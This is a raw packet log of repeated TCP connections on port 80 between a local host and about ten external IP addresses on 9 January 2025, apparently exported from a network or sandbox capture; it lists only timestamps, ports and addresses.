                                                                          Jan 9, 2025 16:50:33.601604939 CET4978980192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:33.775223017 CET8049789103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:33.855196953 CET8049789103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:33.855212927 CET8049789103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:33.855509043 CET4978980192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:33.856681108 CET4978980192.168.11.20103.106.67.112
                                                                          Jan 9, 2025 16:50:34.030430079 CET8049789103.106.67.112192.168.11.20
                                                                          Jan 9, 2025 16:50:39.026952028 CET4979080192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:39.145503998 CET8049790104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:39.145749092 CET4979080192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:39.149307966 CET4979080192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:39.267930031 CET8049790104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:39.402750969 CET8049790104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:39.402765989 CET8049790104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:39.402901888 CET8049790104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:39.403064013 CET4979080192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:39.403091908 CET4979080192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:40.654427052 CET4979080192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:41.671205044 CET4979180192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:41.790436029 CET8049791104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:41.790601015 CET4979180192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:41.797319889 CET4979180192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:41.918745041 CET8049791104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:42.056384087 CET8049791104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:42.056399107 CET8049791104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:42.056499958 CET8049791104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:42.056631088 CET4979180192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:42.056679010 CET4979180192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:43.310148001 CET4979180192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:44.325726986 CET4979280192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:44.444396019 CET8049792104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:44.444587946 CET4979280192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:44.451785088 CET4979280192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:44.451836109 CET4979280192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:44.570327997 CET8049792104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:44.570472956 CET8049792104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:44.570748091 CET8049792104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:44.570841074 CET8049792104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:44.571067095 CET8049792104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:44.571297884 CET8049792104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:44.772950888 CET8049792104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:44.773082972 CET8049792104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:44.773236990 CET4979280192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:44.774693966 CET8049792104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:44.774868011 CET4979280192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:45.965809107 CET4979280192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:46.981437922 CET4979380192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:47.100086927 CET8049793104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:47.100317955 CET4979380192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:47.104903936 CET4979380192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:47.223443031 CET8049793104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:47.744864941 CET8049793104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:47.744882107 CET8049793104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:47.745018005 CET8049793104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:47.745208979 CET4979380192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:47.745573997 CET8049793104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:50:47.745754004 CET4979380192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:47.746321917 CET4979380192.168.11.20104.21.112.1
                                                                          Jan 9, 2025 16:50:47.864893913 CET8049793104.21.112.1192.168.11.20
                                                                          Jan 9, 2025 16:51:03.991451979 CET4979480192.168.11.20194.9.94.85
                                                                          Jan 9, 2025 16:51:04.238154888 CET8049794194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:51:04.238456964 CET4979480192.168.11.20194.9.94.85
                                                                          Jan 9, 2025 16:51:04.243014097 CET4979480192.168.11.20194.9.94.85
                                                                          Jan 9, 2025 16:51:04.484817982 CET8049794194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:51:04.492722034 CET8049794194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:51:04.492779016 CET8049794194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:51:04.492858887 CET8049794194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:51:04.492899895 CET8049794194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:51:04.493042946 CET4979480192.168.11.20194.9.94.85
                                                                          Jan 9, 2025 16:51:04.493123055 CET8049794194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:51:04.493153095 CET4979480192.168.11.20194.9.94.85
                                                                          Jan 9, 2025 16:51:04.493166924 CET8049794194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:51:04.493462086 CET4979480192.168.11.20194.9.94.85
                                                                          Jan 9, 2025 16:51:04.494833946 CET4979480192.168.11.20194.9.94.85
                                                                          Jan 9, 2025 16:51:04.741467953 CET8049794194.9.94.85192.168.11.20
                                                                          Jan 9, 2025 16:51:09.507977009 CET4979580192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:09.650382996 CET8049795198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:09.650613070 CET4979580192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:09.654333115 CET4979580192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:09.800008059 CET8049795198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:09.800015926 CET8049795198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:09.800195932 CET4979580192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:11.163464069 CET4979580192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:12.180735111 CET4979680192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:12.323076963 CET8049796198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:12.323261023 CET4979680192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:12.329804897 CET4979680192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:12.475404024 CET8049796198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:12.475414991 CET8049796198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:12.475651979 CET4979680192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:13.834775925 CET4979680192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:14.852055073 CET4979780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:14.994539022 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:14.994704962 CET4979780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:15.001622915 CET4979780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:15.001667976 CET4979780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:15.144190073 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:15.144418001 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:15.144650936 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:15.144691944 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:15.145132065 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:15.147986889 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:15.148030996 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:15.148192883 CET4979780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:16.506159067 CET4979780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:17.522948980 CET4979880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:17.665361881 CET8049798198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:17.665615082 CET4979880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:17.670087099 CET4979880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:17.815334082 CET8049798198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:17.815377951 CET8049798198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:17.815412045 CET8049798198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:17.815682888 CET4979880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:17.816927910 CET4979880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:17.959017038 CET8049798198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:22.833194971 CET4979980192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:22.951797009 CET8049799104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:22.951913118 CET4979980192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:22.958621025 CET4979980192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:23.077524900 CET8049799104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:23.504389048 CET8049799104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:23.504467964 CET8049799104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:23.504498005 CET8049799104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:23.504673004 CET4979980192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:23.504842997 CET8049799104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:23.504981041 CET4979980192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:24.473150969 CET4979980192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:25.489861012 CET4980080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:25.609513044 CET8049800104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:25.609764099 CET4980080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:25.615835905 CET4980080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:25.735202074 CET8049800104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:26.157382965 CET8049800104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:26.157428026 CET8049800104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:26.157605886 CET4980080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:26.157773972 CET8049800104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:26.157991886 CET4980080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:27.128726959 CET4980080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:28.145760059 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:28.264552116 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.264745951 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:28.271469116 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:28.271497011 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:28.271570921 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:28.390090942 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.390301943 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.390589952 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.390599966 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.390836000 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.855375051 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.855509043 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.855880976 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:28.856323957 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.856488943 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:29.784624100 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:30.800520897 CET4980280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:30.919219971 CET8049802104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:30.919424057 CET4980280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:30.923999071 CET4980280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:31.042606115 CET8049802104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:31.459163904 CET8049802104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:31.459302902 CET8049802104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:31.459454060 CET4980280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:31.460108995 CET8049802104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:31.460300922 CET4980280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:31.461380005 CET4980280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:31.579725027 CET8049802104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:36.472059965 CET4980380192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:36.644311905 CET8049803199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:36.644499063 CET4980380192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:36.651113033 CET4980380192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:36.823652029 CET8049803199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:36.843951941 CET8049803199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:36.843996048 CET8049803199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:36.844192028 CET4980380192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:38.157325029 CET4980380192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:39.174323082 CET4980480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:39.347481966 CET8049804199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:39.347744942 CET4980480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:39.351360083 CET4980480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:39.524208069 CET8049804199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:39.544110060 CET8049804199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:39.544120073 CET8049804199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:39.544389963 CET4980480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:40.860513926 CET4980480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:41.877408028 CET4980580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:42.049768925 CET8049805199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:42.049966097 CET4980580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:42.056781054 CET4980580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:42.056830883 CET4980580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:42.056884050 CET4980580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:42.229502916 CET8049805199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:42.229525089 CET8049805199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:42.229538918 CET8049805199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:42.229798079 CET8049805199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:42.254570007 CET8049805199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:42.254592896 CET8049805199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:42.254723072 CET4980580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:43.562985897 CET4980580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:44.579277992 CET4980680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:44.752249956 CET8049806199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:44.752556086 CET4980680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:44.757000923 CET4980680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:44.929544926 CET8049806199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:44.941435099 CET8049806199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:44.941442966 CET8049806199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:44.941797972 CET4980680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:44.943084955 CET4980680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:45.121125937 CET8049806199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:58.123229027 CET4980780192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:51:58.433916092 CET804980747.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:51:58.434088945 CET4980780192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:51:58.437582970 CET4980780192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:51:58.748205900 CET804980747.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:51:59.430126905 CET804980747.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:51:59.430138111 CET804980747.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:51:59.430233002 CET4980780192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:51:59.950131893 CET4980780192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:00.967410088 CET4980880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:01.266761065 CET804980847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:01.267225981 CET4980880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:01.270879030 CET4980880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:01.569952011 CET804980847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:02.291054010 CET804980847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:02.291101933 CET804980847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:02.291301012 CET4980880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:02.777558088 CET4980880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:03.794389009 CET4980980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:04.103945971 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:04.104228973 CET4980980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:04.110891104 CET4980980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:04.110974073 CET4980980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:04.420485973 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:04.420732975 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:04.420772076 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:04.420998096 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:04.421291113 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:04.421333075 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:05.101855993 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:05.101877928 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:05.102103949 CET4980980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:05.620635033 CET4980980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:06.636502028 CET4981080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:06.947571039 CET804981047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:06.947765112 CET4981080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:06.955643892 CET4981080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:07.266966105 CET804981047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:07.952403069 CET804981047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:07.952579975 CET804981047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:07.952796936 CET4981080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:07.953932047 CET4981080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:08.264956951 CET804981047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:12.963181019 CET4981180192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:13.977304935 CET4981180192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:14.113631010 CET804981176.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:14.113818884 CET4981180192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:14.120506048 CET4981180192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:14.256603956 CET804981176.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:14.256620884 CET804981176.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:14.256757975 CET4981180192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:15.634244919 CET4981180192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:16.651340961 CET4981280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:16.788973093 CET804981276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:16.789169073 CET4981280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:16.795026064 CET4981280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:16.935161114 CET804981276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:16.935261011 CET804981276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:16.935494900 CET4981280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:18.305488110 CET4981280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:19.322474003 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:20.335258007 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:20.471267939 CET804981376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:20.471568108 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:20.480328083 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:20.616453886 CET804981376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:20.616612911 CET804981376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:20.616692066 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:20.616764069 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:20.663352966 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:20.752707005 CET804981376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:20.752722979 CET804981376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:20.752897024 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:21.992404938 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:23.007910013 CET4981480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:23.146619081 CET804981476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:23.147089005 CET4981480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:23.149298906 CET4981480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:23.328792095 CET804981476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:24.321438074 CET804981476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:24.321489096 CET804981476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:24.321769953 CET4981480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:24.322974920 CET4981480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:24.459543943 CET804981476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:29.335966110 CET4981580192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:29.683278084 CET8049815160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:29.683500051 CET4981580192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:29.689902067 CET4981580192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:30.036982059 CET8049815160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:30.037815094 CET8049815160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:30.037868023 CET8049815160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:30.037903070 CET8049815160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:30.038048029 CET4981580192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:30.038104057 CET4981580192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:31.193463087 CET4981580192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:32.210268974 CET4981680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:32.563023090 CET8049816160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:32.563218117 CET4981680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:32.569895029 CET4981680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:32.921925068 CET8049816160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:32.922620058 CET8049816160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:32.922663927 CET8049816160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:32.922698021 CET8049816160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:32.922872066 CET4981680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:34.083333969 CET4981680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:35.100434065 CET4981780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:35.451266050 CET8049817160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:35.451528072 CET4981780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:35.454987049 CET4981780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:35.455009937 CET4981780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:35.455094099 CET4981780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:35.805166006 CET8049817160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:35.805191040 CET8049817160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:35.806282997 CET8049817160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:35.806313038 CET8049817160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:35.806333065 CET8049817160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:35.806349993 CET8049817160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:35.806365967 CET8049817160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:35.806384087 CET8049817160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:35.806472063 CET4981780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:36.156542063 CET8049817160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:37.974652052 CET4981880192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:38.330590010 CET8049818160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:52:38.330790997 CET4981880192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:52:38.335314989 CET4981880192.168.11.20160.25.166.123
